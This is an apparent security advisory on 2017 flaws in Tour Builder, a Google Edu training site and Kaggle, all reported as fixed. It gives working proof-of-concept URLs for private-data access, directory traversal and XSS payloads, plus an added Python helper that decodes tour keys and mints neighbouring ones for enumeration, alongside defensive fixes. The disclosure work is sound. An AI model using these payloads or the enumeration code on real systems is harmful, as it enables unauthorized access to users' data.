Multiple security vulnerabilities in domains acquired by Google

Description

Several vulnerabilities have been discovered between April and September 2017 in domains recently acquired by Google.

The reported vulnerabilities are related to the following domains: withgoogle.com and kaggle.com.

The flaws are of the following kinds: broken access control, directory traversal and cross-site scripting (XSS).

1. Broken Access Control in tourbuilder.withgoogle.com

Vulnerability: CWE-284

Access Vector: Remote

Security Risk: High

CVSS Base Score: 7.5

CVSS Vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Vulnerability Description

Access control involves the use of several protection mechanisms such as authentication (proving the identity of an actor), authorization (handling access permissions), and accountability (tracking of activities).

The website tourbuilder.withgoogle.com does not restrict access to private resources to authorized users: the CSV export route serves a tour's data without checking that the requester is allowed to view that tour. Attackers can exploit this flaw to access data they are not authorized to see, such as other users' private tours.

Proof of Concept

Steps to reproduce:

  1. Log in here: https://tourbuilder.withgoogle.com
  2. Now try to access the following private tour: https://tourbuilder.withgoogle.com/builder#play/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDAg4fAoQoM
  3. You will get the following message: "You do not have permission to view this tour."
  4. We were able to bypass this protection and get access to this private tour with the link below: https://tourbuilder.withgoogle.com/tours/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDAg4fAoQoM/csv

By opening the downloaded CSV file, it is possible to read all information related to this private tour.

The proof of concept is shown in the following picture: Private tour.

Since all private tours have the same URL format, https://tourbuilder.withgoogle.com/builder#play/ID, it is possible to get unauthorized access to any tour by following this format: https://tourbuilder.withgoogle.com/tours/ID/csv

Note that it is possible to enumerate the IDs of private tours.

First, using the following Google dork (GHDB):

site:tourbuilder.withgoogle.com/tour intitle:"Sign in"

We got several links of the form https://tourbuilder.withgoogle.com/builder#play/ID, for example:

https://tourbuilder.withgoogle.com/builder#play/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgICA9_uu5wkM
https://tourbuilder.withgoogle.com/builder#play/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDA2cqHmAoM
https://tourbuilder.withgoogle.com/builder#play/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDAiLq67AoM
https://tourbuilder.withgoogle.com/builder#play/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDAiq2csQkM
...

Brute forcing private IDs also works: the IDs share a long common prefix and only a few characters (7) differ between tours.
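As an added example (not code from the advisory or from Tour Builder), the Python below decodes one of the tour IDs quoted above. The IDs are urlsafe base64 encodings of App Engine datastore keys (the Reference protobuf: application id plus a path of kind/id elements), so the "few characters that change" are simply the trailing bytes of a 64-bit numeric entity id. The script parses a key, re-encodes it, and mints syntactically valid neighbouring keys; the key constant is the one from the PoC, everything else is mine.

```python
import base64

# Added example: decoder/encoder for urlsafe App Engine datastore keys.
TOUR_KEY = "ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDAg4fAoQoM"  # from the PoC above

# Protobuf tags of the Reference message (field number << 3 | wire type).
_TAG_APP = 0x6A          # Reference.app (13), length-delimited
_TAG_PATH = 0x72         # Reference.path (14), length-delimited
_TAG_ELEM_START = 0x0B   # Path.Element (1), start group
_TAG_ELEM_END = 0x0C     # Path.Element, end group
_TAG_KIND = 0x12         # Element.type (2), length-delimited
_TAG_ID = 0x18           # Element.id (3), varint
_TAG_NAME = 0x22         # Element.name (4), length-delimited


def _read_varint(buf, pos):
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def _write_varint(n):
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)


def _read_bytes(buf, pos):
    length, pos = _read_varint(buf, pos)
    return buf[pos:pos + length], pos + length


def _decode_path(buf):
    """Parse the Path message: a sequence of Element groups."""
    elems, pos = [], 0
    while pos < len(buf):
        tag, pos = _read_varint(buf, pos)
        if tag != _TAG_ELEM_START:
            raise ValueError("expected Path.Element start group")
        kind = ident = None
        while True:
            tag, pos = _read_varint(buf, pos)
            if tag == _TAG_ELEM_END:
                break
            if tag in (_TAG_KIND, _TAG_NAME):
                raw, pos = _read_bytes(buf, pos)
                if tag == _TAG_KIND:
                    kind = raw.decode()
                else:
                    ident = raw.decode()
            elif tag == _TAG_ID:
                ident, pos = _read_varint(buf, pos)
            else:
                raise ValueError("unexpected tag 0x%02x in Path.Element" % tag)
        elems.append((kind, ident))
    return elems


def decode_key(key):
    """Return (app, [(kind, id_or_name), ...]) for a urlsafe datastore key."""
    buf = base64.urlsafe_b64decode(key + "=" * (-len(key) % 4))
    app, path, pos = None, [], 0
    while pos < len(buf):
        tag, pos = _read_varint(buf, pos)
        if tag & 7 != 2:
            raise ValueError("unexpected wire type in Reference")
        raw, pos = _read_bytes(buf, pos)
        if tag == _TAG_APP:
            app = raw.decode()
        elif tag == _TAG_PATH:
            path = _decode_path(raw)
        # Reference.name_space (field 20) and anything else is ignored here.
    return app, path


def encode_key(app, path):
    """Inverse of decode_key (namespace-less keys only)."""
    body = bytearray()
    for kind, ident in path:
        kind_b = kind.encode()
        body += bytes([_TAG_ELEM_START, _TAG_KIND]) + _write_varint(len(kind_b)) + kind_b
        if isinstance(ident, int):
            body += bytes([_TAG_ID]) + _write_varint(ident)
        else:
            name_b = ident.encode()
            body += bytes([_TAG_NAME]) + _write_varint(len(name_b)) + name_b
        body.append(_TAG_ELEM_END)
    app_b = app.encode()
    ref = (bytes([_TAG_APP]) + _write_varint(len(app_b)) + app_b
           + bytes([_TAG_PATH]) + _write_varint(len(body)) + bytes(body))
    return base64.urlsafe_b64encode(ref).decode().rstrip("=")


def neighbouring_keys(key, radius):
    """Keys whose last path element's numeric id is within +/- radius of key's."""
    app, path = decode_key(key)
    *parents, (kind, ident) = path
    if not isinstance(ident, int):
        raise ValueError("last element is named, not numeric")
    return [encode_key(app, parents + [(kind, ident + d)])
            for d in range(-radius, radius + 1) if d != 0]


if __name__ == "__main__":
    print(decode_key(TOUR_KEY))   # ('s~gweb-tourbuilder', [('Tour', 5776835978723328)])
```

The takeaway for the fix is that a datastore key is an identifier, not a capability: every route that serves tour data, the CSV export included, has to check the caller's authorization against the tour's owner and visibility. How cheap enumeration is depends on how the numeric ids were allocated (App Engine's scattered id allocator spreads them over the 64-bit space, the legacy policy handed them out sequentially), but the authorization check must not depend on that either way.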

Timeline (dd/mm/yyyy)

  • 28/05/2017 : Initial discovery
  • 28/05/2017 : Contact with vendor team
  • 30/05/2017 : Vendor response: "Nice catch!" (shown in the following picture: Vendor response)
  • 01/06/2017 : Vendor release fix

2. Directory traversal vulnerability in edutrainingcenter.withgoogle.com

Vulnerability: CWE-22

Access Vector: Remote

Security Risk: High

CVSS Base Score: 8.6

CVSS Vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Vulnerability Description

A directory traversal vulnerability has been found on edutrainingcenter.withgoogle.com. This vulnerability allows remote attackers to read arbitrary files outside the intended asset directory. The PoC URL uses %5C.. (a URL-encoded backslash followed by ..) as its traversal step and retrieves the application's Gemfile, the Ruby dependency manifest that lives in the application root rather than under edu_assets/images.

Proof of Concept

Steps to reproduce:

  1. Click on the link below: https://edutrainingcenter.withgoogle.com/trainer_course/edu_assets/images/%5C../%5C../Gemfile

The Gemfile is downloaded.
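As an added example (not code from the advisory or from the site), the Python below shows the kind of check that the PoC path slips past, next to a resolver that holds up against it. The asset root and the naive filter are assumptions; the page gives no server-side code.

```python
import posixpath
from urllib.parse import unquote

# Added example. The asset root is assumed; the PoC path is the one from the advisory.
ASSETS_ROOT = "/srv/app/trainer_course/edu_assets/images"
PAYLOAD = "%5C../%5C../Gemfile"   # relative to /trainer_course/edu_assets/images/


def naive_allows(raw_path):
    """Assumed weak filter: rejects only literal '..' segments split on '/'.
    The segments of the PoC are '\\..', not '..', so it passes."""
    return ".." not in unquote(raw_path).split("/")


def resolve_asset(raw_path, root=ASSETS_ROOT):
    """Map a request path to a file under root, or None if it would escape."""
    decoded = unquote(raw_path)            # decode exactly once; never re-decode
    if "\x00" in decoded:
        return None
    decoded = decoded.replace("\\", "/")   # treat backslash as a separator too
    # Dropping empty segments also neutralises a leading '/', which os.path.join
    # would otherwise treat as an absolute path replacing root.
    parts = [p for p in decoded.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        return None
    candidate = posixpath.normpath(posixpath.join(root, *parts))
    if posixpath.commonpath([root, candidate]) != root:   # belt and braces
        return None
    return candidate
```

Rejecting the `..` segment after backslash normalisation is what stops the PoC; the containment check on the normalised result is there so the function stays safe if the segment filter is ever loosened. Decoding once means a double-encoded `%252e%252e` becomes a literal directory name inside the root instead of a second traversal attempt.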

Timeline (dd/mm/yyyy)

  • 16/04/2017 : Initial discovery
  • 16/04/2017 : Contact with vendor team
  • 18/04/2017 : Vendor acknowledgement: "Nice catch!" (shown in the following picture: Vendor response)
  • 05/05/2017 : Bug Patched

3. Stored XSS Vulnerability in kaggle.com

Vulnerability: CWE-79

Access Vector: Remote

Security Risk: High

CVSS Base Score: 7.2

CVSS Vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Vulnerability Description

Two cross-site scripting (XSS) vulnerabilities have been found on kaggle.com, one stored and one reflected. They allow remote attackers to inject arbitrary JavaScript into pages viewed by other users.

Proof of Concept

Steps to reproduce:

  1. Log in to kaggle.com

  2. Change your display name to the following payload: <marquee onstart=alert(1)>test

  3. As soon as a victim follows you via your profile page (https://www.kaggle.com/AttackerUsername), the injected payload executes in the victim's browser.

There is also a reflected XSS through the returnUrl parameter of the Facebook login return endpoint, which accepts a data: URL as redirect target; the base64 part decodes to <script>alert('XSS')</script>. It triggers in Firefox (at the time of the report Firefox still followed top-level navigations to data: URLs, which Chrome had started blocking in version 60): https://www.kaggle.com/account/authenticate/facebook/return?returnUrl=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
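As an added example (not Kaggle's code), the Python below shows the two server-side checks that close these issues: escaping the display name before it is written into a profile page, and restricting returnUrl to same-origin https destinations, which rejects data: targets along with javascript:, protocol-relative and backslash-prefixed ones. The origin constant is an assumption; the two payloads are the ones from this section. The helper data_url_body only decodes the PoC's data: URL for triage.

```python
import base64
import html
from urllib.parse import unquote_to_bytes, urljoin, urlsplit

# Added example. The origin is assumed; the payloads are the advisory's.
SITE_ORIGIN = "https://www.kaggle.com"
SITE_HOST = "www.kaggle.com"

DISPLAY_NAME_PAYLOAD = "<marquee onstart=alert(1)>test"
RETURN_URL_PAYLOAD = "data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"


def render_display_name(name):
    """HTML-escape untrusted text before interpolating it into a page body.
    '<' and '>' become entities, so no new element or handler can be opened."""
    return html.escape(name)


def safe_return_url(raw, default="/"):
    """Accept only same-origin https destinations; anything else falls back to default."""
    # Control characters and backslashes are parsed leniently by browsers
    # ("/\\evil.example" becomes "//evil.example" in Chrome), so refuse them outright.
    if not raw or any(ord(c) < 0x20 or c == "\\" for c in raw):
        return default
    # Resolve relative paths against our origin, then check scheme and host of the result.
    parts = urlsplit(urljoin(SITE_ORIGIN, raw))
    if parts.scheme != "https" or parts.netloc.lower() != SITE_HOST:
        return default
    return parts.geturl()


def data_url_body(url):
    """Return the document a data: URL would render (used here to inspect the PoC)."""
    header, _, payload = url.partition(",")
    if not header.startswith("data:"):
        raise ValueError("not a data: URL")
    if header.endswith(";base64"):
        return base64.b64decode(payload)
    return unquote_to_bytes(payload)
```

Validating the resolved URL rather than the raw string is deliberate: a relative path like /account/settings is accepted after it is joined to the origin, while //evil.example/ resolves to a foreign host and https://www.kaggle.com@evil.example/ keeps the userinfo in its netloc, so both fail the host comparison.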

Timeline (dd/mm/yyyy)

  • 07/09/2017 : Initial discovery
  • 07/09/2017 : Vendor notification
  • 12/09/2017 : Vendor response (shown in the following picture: Reflected XSS)
  • 28/11/2017 : Vendor fixes vulnerabilities

Credits

  • Issam Rabhi (i dot rabhi at sysdream dot com)